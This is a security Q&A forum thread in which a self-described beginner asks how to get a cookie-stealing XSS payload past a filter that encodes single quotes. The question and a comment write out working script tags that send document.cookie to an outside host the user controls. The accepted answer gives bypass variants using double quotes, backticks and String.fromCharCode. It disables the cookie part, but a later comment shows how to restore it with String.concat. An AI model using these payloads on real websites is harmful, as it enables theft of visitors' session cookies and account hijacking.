# How to bypass an XSS filter encoding single quotes?

Tags: web-application, xss, attacks

I'm trying to do an XSS attack test on a website.
I am using `"` and `<>` just fine and I have managed to escape the string. Now I'm trying to send my own cookie to my server that saves it to a txt file.

I inject this code to send the cookie:

```
<script>document.location='http://khodrochi.unaux.com/khodrochi.php?x='+document.cookie;</script>
```

The only problem is that it encodes both single quotes (`'`) and it changes to `%27`. Is there any way I can bypass this encoding on single quotes or inject the code somehow without single quotes?

Comment: Is there some reason you don't want to use " (actual quotation mark) in the injected payload? You said it was working (in practice, I doubt you'll ever find a real-world system that escapes ' but not "). Also that's a very crude and obvious XSS payload; you generally want to be more subtle although I suppose it works for proof-of-concept.

Comment: @SteffenUllrich: the linked question doesn't have the same execution context as it's about breaking from HTML attributes, which this question doesn't need to care about.

Answer (score 4, accepted):

I see at least 3 possible bypasses:

### Double quotes

The most obvious one, which should work based on your post, is by using double quotes instead of simple quotes:

```
<script>document.location="http://khodrochi.unaux.com/khodrochi.php?x="/*+document.cookie*/;</script>
```

### Backticks

The second one, which is rarely filtered in my experience, is by using **backticks** around the string:

```
<script>document.location=`http://khodrochi.unaux.com/khodrochi.php?x=`/*+document.cookie*/;</script>
```

### String encoding

The third one works by encoding the static string in JavaScript:

```
<script>document.location=String.fromCharCode(104,116,116,112,58,47,47,107,104,111,100,114,111,99,104,105,46,117,110,97,117,120,46,99,111,109,47,107,104,111,100,114,111,99,104,105,46,112,104,112,63,120,61)/*+document.cookie;*/</script>
```

---

**Note:** to prevent anyone from inadvertently running a cookie-stealing script on this page, I've intentionally disabled the cookie part from those strings.

Comment: for some reason when i use double quotes instead of single ones it dosnt work. here is the code : `<script>document.location="http://khodrochi.unaux.com/khodrochi.php?x="+document.cookie;</script>` i know for sure that my source in server side that saves the input is ok becouse i tested it. and one more thing. the cookies on target website is like this:  _ga and _gat_gtag_UA_74850411_3 and _gid. is it possible that the problem is it has 3 cookies instead of one?

Comment: ohh i see the problem now! when i use the code it removes the + on source code. what should i do about that? sry this problem is taking too long im just a begginer

Comment: Using the 3rd method: `String.concat(String.fromCharCode(/* ... */), document.cookie)`. Also note that HTTP-only cookies can't be grabbed in JavaScript.